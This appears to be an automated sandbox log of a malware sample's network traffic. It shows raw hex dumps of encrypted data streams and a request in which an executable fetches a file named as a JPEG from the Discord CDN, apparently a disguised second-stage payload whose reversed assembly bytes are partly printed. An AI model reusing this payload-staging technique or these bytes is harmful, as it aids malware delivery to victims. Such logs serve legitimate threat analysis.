                                                  2022-04-23 06:15:05 UTC1342INData Raw: 42 d5 d7 27 3d ff ce f7 52 6f 90 bd 34 5b dd d4 f2 74 aa 42 60 98 4b e8 86 8f 0a e3 4f 90 8e 5d f8 78 31 5e c5 09 bc 5f 2f b1 e1 3c 2f b6 5a 37 94 3a af 46 d2 9f da f9 e0 bb b4 bf bb 53 29 9e 3c 6c d9 6e 34 e7 ee 2d 4f fe 51 ee 8e f9 ae 83 fc fd 91 dc ce 7d 63 08 d8 bf 70 c6 b2 b2 78 1d 8b d9 09 25 62 20 de 3e 09 22 ff 1b 3e 38 12 d2 ed 64 76 d4 7b bb a9 1c 28 11 a1 8d 15 a6 77 7a 29 ac f3 42 08 86 bf fd f8 f8 c7 29 60 2a f8 dc 3a 09 12 2e dd ec 3f fb 35 5d e1 cb 25 0a e0 24 25 4d 10 30 5f 55 46 2b e2 ef 7f 97 14 91 2a 1c 99 7c c6 af c1 a5 21 6b 01 3e 4a 9f de 57 9c 3d ac f3 c1 f5 d2 b0 c0 e5 92 62 b4 93 c9 33 31 ac 6d e0 81 1c 99 6a 35 5d f6 c3 14 60 3f e1 c7 8d 23 de a5 80 fa 3c d1 5a 65 23 89 67 5f 1f 50 b6 f7 74 13 32 2c a2 e8 99 63 11 6a 77 94 a4 6f
                                                  Data Ascii: B'=Ro4[tB`KO]x1^_/</Z7:FS)<ln4-OQ}cpx%b >">8dv{(wz)B)`*:.?5]%$%M0_UF+*|!k>JW=b31mj5]`?#<Ze#g_Pt2,cjwo
                                                  2022-04-23 06:15:05 UTC1346INData Raw: 87 7b aa f7 e7 1d b1 04 24 69 14 0b fa bb c6 8c 54 96 d4 12 a2 dd 1a 81 b5 1b b6 01 d3 dc d7 71 74 cb f4 84 9c 58 81 05 ac c0 48 d0 4f fb 3c 40 fd d0 d4 77 93 6d d5 cf 2e 92 c7 73 d7 7b 6e c7 e4 df bd 89 e3 c0 df 2d e2 68 27 42 a1 f9 ff 1b 29 73 dc 2d 51 f8 4f 01 ef af 0b 1f 89 e1 15 f4 aa 22 c0 7d 4a 42 d2 98 7d 54 55 46 3b 76 a4 e0 46 7a 8d 34 80 71 a8 6b ed ec ef ca 7b 86 7f eb bd ad 4f 79 1d 12 c9 ee 4a 73 43 1f ad 77 6f c6 6e c0 96 4b 1f ae bc c2 f2 44 f5 77 bd 25 21 2f ca f9 b2 d8 27 98 b3 9e 4a f7 0c e1 b4 cb 9a 43 ac 4f 85 fe fb 17 35 a7 76 da ec 3e 49 8b 34 f4 f5 e2 22 b4 43 3c be fc cf 33 0b 79 07 bb 1a bc 47 bb cb 9e 8e 05 06 f9 3e 86 93 ef e9 1b 22 e4 88 60 81 60 83 41 a0 b5 88 ba f0 6c 7d ba e9 93 67 4e be 62 06 1c 82 a1 74 a1 91 38 55 0f 3c
                                                  Data Ascii: {$iTqtXHO<@wm.s{n-h'B)s-QO"}JB}TUF;vFz4qk{OyJsCwonKDw%!/'JCO5v>I4"C<3yG>"``Al}gNbt8U<
                                                  2022-04-23 06:15:05 UTC1350INData Raw: bb d9 d3 a7 28 73 ce da ca 35 c6 71 de 1e 29 7a 8a 7d 1d 60 59 11 04 18 ab 6b 53 34 c7 1f e1 68 a1 bb 76 66 b3 a1 f1 fe a1 51 b1 a0 c2 15 0a 15 0f 07 78 04 e7 e4 24 cd e2 ce 5c 3e e5 a8 28 3e c4 cb 10 ac af 0a ad 92 1a 72 fc 35 ad eb 0a d3 9d 53 25 5c e3 f9 f9 5a 50 81 36 32 5e 3d d5 74 9e 9b 23 ae 2d 33 f0 33 ad e2 5b f1 e0 c3 57 dd e7 4c e6 f1 0b 93 e2 15 35 28 10 f1 7b c8 fd e9 7b cf 9c a3 ef c9 3b 40 90 d8 55 7d ef cd 1c 2a 67 67 f6 45 a6 42 e9 99 90 47 a5 40 17 a7 a2 8e 8e 20 66 b1 f5 88 8c 27 c3 5d 51 f4 d0 0e 81 80 64 5c 09 93 92 39 66 a7 06 1d 16 b9 d4 8a ed 27 ba e5 ef 78 78 9a 6a 07 ea 32 a5 91 22 31 b5 aa 73 7c 11 f8 7e b2 c5 62 68 93 3e 56 1a cf 26 e6 57 b1 4d 6f a6 6e dc 81 7f 6b ea b4 97 d7 37 31 5e 90 a5 f7 05 68 9a b2 de 4e 5b 55 e3 bd 30
                                                  Data Ascii: (s5q)z}`YkS4hvfQx$\>(>r5S%\ZP62^=t#-33[WL5({{;@U}*ggEBG@ f']Qd\9f'xxj2"1s|~bh>V&WMonk71^hN[U0
                                                  2022-04-23 06:15:05 UTC1362INData Raw: 28 1b 5d 23 8b 32 e9 05 60 cd 49 25 4b 21 28 44 40 71 5a cb 5f 4a 5a 86 51 9f 73 8d c9 95 65 1a 2d e0 a9 c7 11 ff b5 28 21 a4 92 c6 ea 81 e6 03 00 51 1f 75 13 21 15 75 98 7c 21 76 5d 88 ed 31 9a 1a 15 4a e1 32 16 dc 5b e2 49 d8 f0 c9 7f 40 b4 3c f1 28 08 04 26 9a 3d 8c 84 05 c1 c3 44 46 5a e9 35 61 cd 85 10 e2 52 e9 62 64 42 da 08 cb 1f 1d d3 d4 0e 97 da 9a c8 c3 68 ca ab a8 e6 75 9e 13 3e e1 3e fe 7b a8 d2 96 6f b3 50 10 e8 f4 7a 26 62 31 f6 68 0e ed ff 2e d5 2e 15 68 73 0f 3d 1c d1 ae 07 d8 ba 09 ad cc ab eb 8d ad 74 2d f8 e9 96 94 65 0d 3e 97 bf b8 20 92 4c 35 9c 30 b0 8e 34 9f cf 73 42 99 1c 9f 6d 63 b3 4b d3 45 9f 1f b3 f8 14 36 f0 89 95 c9 df c8 f8 c3 2d ef 91 12 cf 43 0c f5 bf 64 b7 4c 6a 99 d1 64 ea 63 79 41 dc 18 7e ec 74 b6 ed 73 dd b3 29 b1 27
                                                  Data Ascii: (]#2`I%K!(D@qZ_JZQse-(!Qu!u|!v]1J2[I@<(&=DFZ5aRbdBhu>>{oPz&b1h..hs=t-e> L504sBmcKE6-CdLjdcyA~ts)'
                                                  2022-04-23 06:15:05 UTC1366INData Raw: f3 b0 48 f2 b1 9a 91 b4 33 78 b2 15 10 ed aa 02 19 51 0e 99 ae a3 0a 98 2e 18 1b af 44 29 e9 de 53 d2 72 8f 66 b4 a5 3c 1d d5 2c 72 fe 9e 46 e7 98 d4 ee 14 e4 f1 ff 87 12 e9 a0 97 a7 78 d9 e9 47 d7 1b 81 e1 2f d6 c5 40 04 0a 91 68 41 c2 e3 c6 f9 ed e4 26 b6 2f ed b9 94 db b7 01 ee b7 a0 9e 07 1b f9 10 90 a7 48 05 54 b2 a2 4c 60 a6 51 13 f6 55 54 8a 13 30 5a 06 49 86 00 57 0f 19 fe 24 1e 9e bf bf 98 95 fe a0 f4 b0 1d 04 f6 dc 06 e7 13 35 13 dc a7 4f 9a 37 8e 3c a2 99 94 e1 95 9f fc 90 ec 4d b0 ac 42 fe 8c 5f 49 56 39 ef 46 2b 60 49 fe 0e 41 9f 32 17 bc a4 93 4e 41 23 a8 f4 22 0f ac df 5d 52 94 29 ce d5 d1 b7 51 e5 85 80 c8 98 cc 31 b9 87 59 fd 59 5d 9b fc d6 31 04 7a 76 8e 1b bb ca 3b c6 8c 5e a7 d5 66 f0 70 25 9b 1a c0 e2 d7 77 15 55 89 b5 11 25 ab 01 cc
                                                  Data Ascii: H3xQ.D)Srf<,rFxG/@hA&/HTL`QUT0ZIW$5O7<MB_IV9F+`IA2NA#"]R)Q1YY]1zv;^fp%wU%
                                                  2022-04-23 06:15:05 UTC1382INData Raw: 41 d3 e9 b4 3d 63 16 ad a3 d3 5e 2e c8 39 57 a8 22 0d 03 e4 9a c5 48 a1 25 64 bc a0 8a b0 21 30 48 2b 56 e7 30 cf ba 2f 24 b1 ab e8 41 8d e1 96 7a 5f 8d 91 b7 76 d9 9d c9 1c 5b ff 57 85 72 0e e2 93 9d 5b f6 ad 68 8e 0a da a9 2b 36 a5 9e 7f 68 89 88 10 c4 90 3b 53 6f 71 72 3e 97 41 48 47 cd e4 91 9e c8 ee 52 2d 8f bb 2d a7 e5 2f 77 e4 18 7a a4 30 84 85 aa 22 79 4b 1e 11 2b 46 9d ce f7 15 59 28 97 e7 1d 93 87 db 34 14 b8 96 e0 f2 1d c0 1b d3 90 4d a0 7b e8 06 58 2f 61 c6 b8 07 4f d5 76 24 61 7f 8c 4a d1 b6 53 75 66 b5 2f a4 67 57 11 16 53 6e f4 50 1d 18 1c 62 8c a4 76 b5 ab 7a 8b 5d 42 34 73 2a f1 e9 ba 28 3a 31 de 6c d9 c8 80 25 4b 77 72 08 70 39 fb ab 1e 08 37 f0 28 df 95 db 55 53 c5 0e a4 91 2b 85 30 38 79 2d 18 0a 6b db 87 06 44 db 4c 81 96 47 23 6e 0b
                                                  Data Ascii: A=c^.9W"H%d!0H+V0/$Az_v[Wr[h+6h;Soqr>AHGR--/wz0"yK+FY(4M{X/aOv$aJSuf/gWSnPbvz]B4s*(:1l%Kwrp97(US+08y-kDLG#n
                                                  2022-04-23 06:15:05 UTC1394INData Raw: 93 00 0f 45 9b 09 27 64 3c f7 40 d1 c5 1b 59 b9 56 b0 8c 95 6e a0 24 d3 cb 75 17 18 06 f1 db aa 7a e1 11 a5 1f 45 63 6c 81 51 65 fb f8 1c bb 66 c3 39 73 5a 04 67 cc 19 29 50 d9 42 83 49 2c 3f f1 91 9e 3d 3c 81 6b 51 45 27 2e b3 8d 32 6e 0d b0 ae 93 32 93 d7 c3 ce 35 fb a3 6d 07 ae 1c f9 17 68 10 00 04 14 2c 34 a2 c3 8a 69 4e e6 77 a7 a9 3f fc 53 25 1a f6 23 fd 15 ed fb de 3f 1a 86 c9 f7 fa a7 30 74 2e f0 2b 66 04 64 05 20 89 8d e1 c5 69 6e 2b ea 56 60 a7 59 d3 10 fe 37 36 2e f5 70 74 d0 84 1a 82 68 05 88 32 37 e6 3d 8a fd 21 98 93 31 6c ad 3f 9d 23 5d 31 65 2c 9c 79 cd 5c 4c 1d ea 19 ec 99 8e 2e 6e c8 d3 f5 5c 79 48 ec b5 a0 1d af 64 41 0b 0e 1a bd 54 4d 6b 29 d5 12 94 16 fb 28 9c 2b 67 86 50 03 28 5e aa e9 3a 17 a5 5b 7b eb 51 c5 c2 b1 f8 8a a0 46 45 43
                                                  Data Ascii: E'd<@YVn$uzEclQef9sZg)PBI,?=<kQE'.2n25mh,4iNw?S%#?0t.+fd in+V`Y76.pth27=!1l?#]1e,y\L.n\yHdATMk)(+gP(^:[{QFEC
                                                  2022-04-23 06:15:05 UTC1410INData Raw: e6 27 22 a3 e7 02 ae b9 11 8c b7 1d cb db fb 20 2a bb c5 79 6b 6a d2 96 ef ab cd 57 e5 07 7d 33 69 0f 83 7e bf 04 ba b9 70 ce 54 e7 ce ec 40 49 38 b3 5e 43 da de 0c 67 02 db 0d a5 e9 4b 29 7d 59 bd 49 26 cf 74 7a 68 f8 01 de 42 cc b0 ac 74 b1 c2 10 31 38 98 e1 32 36 12 bc aa d0 a4 ae 93 64 e9 1c 1a 51 fa 72 6b 49 eb b3 ee f8 7f 59 d6 f3 a0 af 3b ad 7e 6f b4 8d c0 ed 11 10 4b 70 e2 7a b4 90 d3 88 60 b9 4e 33 55 ab 70 de ce a0 b6 64 99 94 08 4d e6 50 38 5f 08 ca 38 da ad 8a 6e 52 d0 05 27 df e9 64 61 52 f4 b6 96 1a 99 92 d4 28 95 6f 18 23 d1 c2 8e 8f d1 12 ce b3 20 42 cc a6 06 7c 7b 22 0c 30 55 50 10 6f 09 5c fc f1 22 26 76 b6 a3 e2 50 ae b3 9c e7 22 4a 98 b6 89 af 28 a3 26 e1 99 a4 f6 02 3c c6 83 f1 d6 9d 1a 2b 40 ee e4 9f 33 5a fa 71 bc f7 95 30 90 74 c9
                                                  Data Ascii: '" *ykjW}3i~pT@I8^CgK)}YI&tzhBt1826dQrkIY;~oKpz`N3UpdMP8_8nR'daR(o# B|{"0UPo\"&vP"J(&<+@3Zq0t
                                                  2022-04-23 06:15:05 UTC1426INData Raw: f2 68 3d af 89 e1 66 3b 7b 30 4e df e1 a5 a2 7e bf 82 3d 2f 11 a2 d5 2c 85 58 17 9a 55 ae 54 8b 42 b6 91 38 91 fb b7 67 72 8c f8 f3 0f e6 c8 f9 83 df d4 8a 19 a2 ec cd 2f 76 b0 93 5e be cb 44 7e d8 8e ad 34 5b 53 6e 99 42 b0 fb 55 7a 8d 75 19 b0 e3 f9 1f da 85 53 b5 45 91 cf 28 eb 21 63 34 24 6b e5 01 9d 0a 63 20 aa 72 82 8f 75 f2 20 ba 21 dc 71 75 a5 ec 7a 1c 91 a9 15 3d 41 c9 99 ce fe 0d fa 67 4b 93 5e 69 e4 8e 94 10 f4 f5 05 97 c5 55 82 1d b7 b5 ca 63 10 25 f3 0e c9 83 e7 24 df e3 d1 21 96 2c 88 c2 5e e1 58 30 cb 72 00 7c 5c f0 2b f0 c5 d1 f9 2c 51 e0 98 e5 9d f5 2d f4 a8 7c 86 2d 6a 53 ea 3e ba e4 dc ee 08 5b 16 76 a9 c7 6d d5 15 09 b0 d7 8d e3 c1 4c c8 ec 4d 3e 8f 4f 9f ae c0 94 e9 e1 a3 b0 e0 8d 07 70 9f 1c f5 b3 90 c7 c6 89 8b c9 dd 68 4b ea a7 21
                                                  Data Ascii: h=f;{0N~=/,XUTB8gr/v^D~4[SnBUzuSE(!c4$kc ru !quz=AgK^iUc%$!,^X0r|\+,Q-|-jS>[vmLM>OphK!
                                                  2022-04-23 06:15:05 UTC1442INData Raw: f6 04 92 0c f3 8a c4 3f 66 f7 32 e0 9b f4 5e f7 2d 37 08 9e 57 43 08 c6 08 35 05 b3 6a 6b e9 4d 2f fd a2 f5 28 91 74 3d b6 89 2d 09 6a 99 3f ce 07 fe 6c 26 2c 3a 17 e9 69 b2 95 60 17 dc 8e b8 53 8c 7b 06 42 90 98 3c c5 d8 47 ef 2e 9f 0e ce 78 56 14 cc bd c7 2c 1b 84 72 d3 84 6e fe ef f5 26 33 e4 db f6 19 ab 8f d8 ad 13 93 3a ce d6 8d 61 30 e3 59 a3 b8 9b cc c6 a0 e1 c2 84 41 97 05 07 e9 4b fb 89 24 8e 89 eb 59 d1 31 ce 58 89 c9 04 d5 16 f5 21 8d d4 4f 20 5a a4 49 77 85 23 80 3d 10 4a 7d 5e 21 a1 41 39 f2 07 38 9e e4 f0 d8 74 ac 54 be 0a e2 3b 17 b1 c0 48 99 38 47 e5 5b d4 c8 e3 27 c7 ed 71 54 ee d0 ed f0 d1 63 60 f1 b9 80 b1 c9 21 18 f3 72 00 d4 f1 81 5a f7 5f 77 c3 e7 84 9a 9c f4 d6 ff 46 c8 8a e9 75 94 6a 01 33 85 12 db 66 7b 2a 37 aa 23 ac 51 5a f4 97
                                                  Data Ascii: ?f2^-7WC5jkM/(t=-j?l&,:i`S{B<G.xV,rn&3:a0YAK$Y1X!O ZIw#=J}^!A98tT;H8G['qTc`!rZ_wFuj3f{*7#QZ
                                                  2022-04-23 06:15:05 UTC1458INData Raw: 04 56 40 8a d7 da ae ba 2b b7 63 3c 9b e1 ae d9 e4 08 6b 8f f9 ff 16 3c dd 75 ea df a6 ac 17 b4 ec d5 5e 9e bc 90 3e ea bc ee b3 cf d5 9d cd 93 63 9b f9 ae a9 60 15 e5 69 6b fc cf 59 61 5e 66 18 aa 87 60 6d a9 e6 16 45 a7 c4 cb 66 89 a5 cf 87 45 0d d4 f0 22 5a ad 22 14 64 36 98 29 68 3b 0e f7 4a 4b b6 29 b4 b1 b8 6e b0 fe 55 8b ac 07 60 46 4a 77 90 1f 44 1b 4b b2 3f 2c 77 fa 6e 26 e2 3d 5e 6a 82 2b 16 94 6d 9b 76 c7 f1 0a 4d 61 98 7d 30 29 e4 55 58 c1 a3 9d ae 4b 60 f8 21 31 6d 08 81 60 17 a3 5e 6e d5 31 69 18 c5 23 f7 79 bc 69 d4 08 fd 5c ff 2b 5c a7 26 38 6b 0f 44 af 3e 29 96 03 bd fd b7 9f 46 9c 00 06 f5 bd d9 f9 e9 26 63 30 5d 47 56 65 86 90 45 3e 70 8e 5d 5c ae 42 42 f8 fd 03 f3 98 dd c1 db 8e 2e ba f9 cc 12 a7 41 40 45 b2 5a d4 59 cf 00 4a bb ec 56
                                                  Data Ascii: V@+c<k<u^>c`ikYa^f`mEfE"Z"d6)h;JK)nU`FJwDK?,wn&=^j+mvMa}0)UXK`!1m`^n1i#yi\+\&8kD>)F&c0]GVeE>p]\BB.A@EZYJV
                                                  2022-04-23 06:15:05 UTC1474INData Raw: cd 9e 21 75 8a a4 57 ea 76 64 61 06 af 04 01 07 2f 5f c1 59 ce 30 b9 6e 6c c2 b3 b8 bc 0a a5 7e a6 e9 48 6b 5f 2d 61 14 e2 f6 5b 81 f6 48 97 9e d5 dc c5 d9 f1 ec 8f e7 cb 1f 8d f1 6d 3c 94 2d a7 54 77 0f 55 c7 88 d6 a3 68 ac 2d ac 08 f7 1b 20 ae 21 1b 34 99 ee 83 9a 14 ab de 0c c9 84 e9 d5 6b fb 37 8b 51 36 82 a8 6b d5 bc 20 f0 83 1d ad e1 1c a6 74 66 3d d8 07 a9 0e 06 8f 2e dc cd fa e8 bd fa 20 9b 6f d4 a4 8a ee 13 7e b8 e8 06 0b f6 34 43 53 a7 e6 d5 05 1b 61 06 b5 dc 55 33 38 9a 04 99 98 6e 76 e4 f1 0c e9 f1 29 a7 74 1b 75 60 0a 15 83 b0 b8 97 09 eb 17 22 77 ba 30 67 57 50 03 d2 92 63 03 84 1b 36 90 36 f4 c7 89 b8 49 15 ce 04 7c bd 2e 64 e4 4b 83 22 1d 2e c8 01 71 04 02 05 5e ad ff 23 2a 52 59 7c 48 de c9 ff 04 99 77 76 96 29 51 fa 8c 5f ea 26 6c 28 e3
                                                  Data Ascii: !uWvda/_Y0nl~Hk_-a[Hm<-TwUh- !4k7Q6k tf=. o~4CSaU38nv)tu`"w0gWPc66I|.dK".q^#*RY|Hwv)Q_&l(
                                                  2022-04-23 06:15:05 UTC1490INData Raw: 06 11 ba 50 c0 fb 76 8e 34 6c c6 27 bd 9e 1b 8f 17 13 be 49 db da 6a 85 42 00 b7 54 c1 ed 54 86 71 39 85 7f f5 eb 55 af 21 58 ab 4e dc f2 53 a0 07 35 99 33 ac a9 17 ee 76 07 b9 10 88 e2 55 b0 21 61 f6 25 b7 a6 01 ff 77 11 86 1e d7 f5 53 a6 35 6b d7 25 86 fa 19 f5 70 10 ba 74 df 87 27 c3 c6 13 b3 57 c2 7d 8c 4d dd 63 c1 80 1f 87 27 4a b7 27 aa 01 9f b9 d4 8f 12 d3 77 8b 02 2c b0 6e fb b9 04 e4 65 63 d8 01 be cf 4e 94 11 36 b3 16 96 84 70 95 00 01 be 44 d0 52 f2 16 8a b6 17 fa 66 22 b2 48 c2 dc 62 98 12 55 f2 17 8e b6 16 c6 52 40 b2 50 c4 93 66 86 10 55 a0 59 84 b2 4d a1 29 77 d9 65 a4 bd 02 e5 70 54 bd 15 d5 e4 10 a2 60 75 d0 20 90 91 19 d4 40 1f bf 5a ca fa 5b 9f 28 67 ce 2a 9f bb 11 fa 6e 3f bb 59 ce fa 7b bb 2b a3 4c 8a 8e e8 33 e7 f3 19 26 94 21 68 15
                                                  Data Ascii: Pv4l'IjBTTq9U!XNS53vU!a%wS5k%pt'W}Mc'J'w,necN6pDRf"HbUR@PfUYM)wepT`u @Z[(g*n?Y{+L3&!h
                                                  2022-04-23 06:15:05 UTC1506INData Raw: 12 00 27 00 00 00 00 28 01 00 00 2a dc 0a 00 00 07 6f 07 06 2c 07 0a de 00 de 26 03 de 26 0a 00 00 c2 6f 08 06 00 00 8f 6f 06 00 01 19 6f 06 00 01 66 28 07 0a 00 00 bb 6f 0a 00 00 c1 28 a2 06 00 00 bb 28 65 95 d1 36 20 1c 25 a2 0a 00 00 c0 6f 06 00 00 cb 28 1b 25 a2 06 00 00 bb 28 65 95 d1 12 20 1a 25 a2 0a 00 00 bf 28 04 12 04 13 0a 00 00 be 28 04 12 04 13 0a 00 00 bd 28 19 25 a2 06 00 00 bb 28 65 95 d0 f0 20 18 25 a2 0a 00 00 bc 28 17 25 a2 06 00 00 bb 28 65 95 d0 bb 20 16 25 01 00 00 85 8d 1d 06 00 00 bb 28 65 95 d0 a9 20 08 0a 00 00 bb 6f 06 00 00 bb 28 65 95 d0 9b 20 06 00 00 bb 28 65 95 d0 88 20 08 0c 0a 00 00 ba 73 00 00 00 c6 dd 05 2c 09 0d 17 01 2b 06 00 00 cd 28 07 2d 06 00 00 cc 28 00 00 2b 0b 03 2b 26 03 2d 1e 0a 00 00 b9 73 00 de 26 f7 2b 0a
                                                  Data Ascii: '(*o,&&ooof(o((e6 %o(%(e %(((%(e %(%(e %(e o(e (e s,+(-(++&-s&+


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.649727162.159.129.233443C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-04-23 06:15:18 UTC1517OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2022-04-23 06:15:18 UTC1517INHTTP/1.1 200 OK
                                                  Date: Sat, 23 Apr 2022 06:15:18 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 387072
                                                  Connection: close
                                                  CF-Ray: 700476c42ea89261-FRA
                                                  Accept-Ranges: bytes
                                                  Age: 400
                                                  Cache-Control: public, max-age=31536000
                                                  ETag: "fce090eab4bfe6a3d63ebc34f3979aaf"
                                                  Expires: Sun, 23 Apr 2023 06:15:18 GMT
                                                  Last-Modified: Fri, 11 Feb 2022 19:48:42 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: HIT
                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Cf-Bgj: h2pri
                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                  x-goog-generation: 1644608922184980
                                                  x-goog-hash: crc32c=wezq3g==
                                                  x-goog-hash: md5=/OCQ6rS/5qPWPrw085earw==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 387072
                                                  X-GUploader-UploadID: ADPycdvbsis545DrUcJrq4geeaPe8ooQvs8Tt67fOv-bZSOPg9BdcdU0o2Z3LCRdnEX7N_0xDLSjrt9xMa7PJ0aDr-Yo_A
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MGwnrWk6eKylf3EQsr9cAJvgnGvmHHH%2BmEuScoQiNyh2gu56W%2Bdq54mT17bBS7BHeRSf5bOKW3QfCxqd3RMC0CzXL%2B2SzaO1Zrdlk%2FH7RI7U5VFHtX07hqYlDDi6lr6mpfe%2FYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  2022-04-23 06:15:18 UTC1519INData Raw: 00 00 00 00
                                                  Data Ascii:
                                                  2022-04-23 06:15:18 UTC1519INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  2022-04-23 06:15:18 UTC1520INData Raw: 00 00 04 00 00 00 00 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 02 e4 00 00 00 00 00 00 00 00 00 00 02 e4 00 06 00 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: ?OFNI_NOISREV_SV4XH0
                                                  2022-04-23 06:15:18 UTC1521INData Raw: 18 03 07 05 ed 81 11 35 12 01 02 00 08 05 1d 02 05 1d 02 18 08 06 07 0a 18 05 1d 02 07 05 0e 0e 02 07 04 a9 80 12 00 20 05 18 00 20 03 a1 80 12 00 00 05 02 02 02 02 e9 80 12 a5 80 12 75 12 02 08 07 0f 7d 12 0e 05 1d 02 20 07 0e 1d 0e 01 00 05 89 80 11 00 20 05 89 80 11 00 00 05 69 81 11 01 01 00 06 89 80 11 02 7d 12 71 81 12 02 05 07 0c 9c 80 12 01 07 05 08 08 0e 02 20 05 03 08 01 20 04 0e 0e 08 0e 08 0e 94 80 12 07 07 0b 1c 0e 0e 02 00 05 0d 00 20 03 49 82 11 00 20 05 bd 80 12 00 00 05 49 82 11 08 08 bd 80 12 04 07 0a 21 81 11 08 25 81 11 11 81 11 1d 81 11 0e 01 06 20 11 08 08 05 1d 0e 03 20 07 0e 01 01 00 04 02 0e 02 03 07 05 05 1d 0e 01 02 00 06 d5 80 11 0e 01 00 06 0e 01 81 12 01 00 06 98 80 11 0e 0e 0e 04 07 08 05 1d 08 39 81 12 03 07 08 05 01 07 03
                                                  Data Ascii: 5 u} i}q I I!% 9
                                                  2022-04-23 06:15:18 UTC1523INData Raw: 65 64 6c 69 75 42 65 63 72 75 6f 73 65 52 64 65 70 79 54 79 6c 67 6e 6f 72 74 53 2e 73 6c 6f 6f 54 2e 73 65 63 72 75 6f 73 65 52 2e 6d 65 74 73 79 53 33 00 01 41 00 00 00 00 00 15 00 01 08 00 00 00 00 00 14 00 01 08 00 00 00 00 00 13 00 01 08 0e 1d 00 28 04 00 00 00 00 00 12 00 01 08 00 00 00 00 00 11 00 01 08 24 11 00 28 04 00 00 00 00 00 10 00 01 08 00 00 00 00 00 0f 00 01 08 00 00 00 00 00 0e 00 01 08 b8 80 12 00 28 05 00 00 00 00 00 0d 00 01 08 00 00 00 00 00 0c 00 01 08 00 00 00 00 00 0b 00 01 08 00 00 00 00 00 0a 00 01 08 00 00 00 00 00 09 00 01 08 00 00 00 00 00 08 00 01 08 00 00 00 00 00 07 00 01 08 0c 81 12 00 28 05 00 00 00 00 00 06 00 01 08 60 12 00 28 04 08 00 28 03 ac 80 11 00 28 05 4c 11 00 28 04 d5 81 11 01 01 20 06 00 00 00 00 00 05 00 01
                                                  Data Ascii: edliuBecruoseRdepyTylgnortS.slooT.secruoseR.metsyS3A($(((`(((L(
                                                  2022-04-23 06:15:18 UTC1524INData Raw: 06 1c 39 12 18 e5 80 12 03 20 09 18 18 01 20 04 02 10 18 02 02 00 06 02 0e 0e 02 03 00 06 09 10 09 19 18 02 04 00 08 0e 10 18 18 02 00 06 22 01 0e 10 18 01 00 05 09 10 09 18 18 02 04 00 08 08 2d 82 12 18 18 09 04 00 09 18 02 01 00 04 02 01 18 02 78 11 18 03 00 07 08 01 08 2a 02 09 10 09 18 1d 02 03 00 08 2d 82 12 18 09 18 18 04 00 09 08 2d 82 12 18 08 03 00 08 c5 80 11 10 08 0a 02 00 08 08 70 12 08 02 03 00 07 08 10 08 08 02 00 06 08 2d 82 12 08 01 03 00 08 08 08 08 18 18 04 00 07 08 08 2d 82 12 08 08 08 05 00 0a 08 00 00 03 6c 11 08 01 00 05 68 12 06 03 05 1d 01 01 20 05 05 1d 00 20 04 0e 00 20 03 02 01 01 20 04 05 1d 06 03 e5 80 12 02 01 20 06 1c 39 12 08 e5 80 12 03 20 09 08 02 01 20 04 18 1c 01 02 20 05 08 08 02 02 20 05 5c 12 25 82 12 25 82 12 25 82
                                                  Data Ascii: 9 "-x*--p--lh 9 \%%%
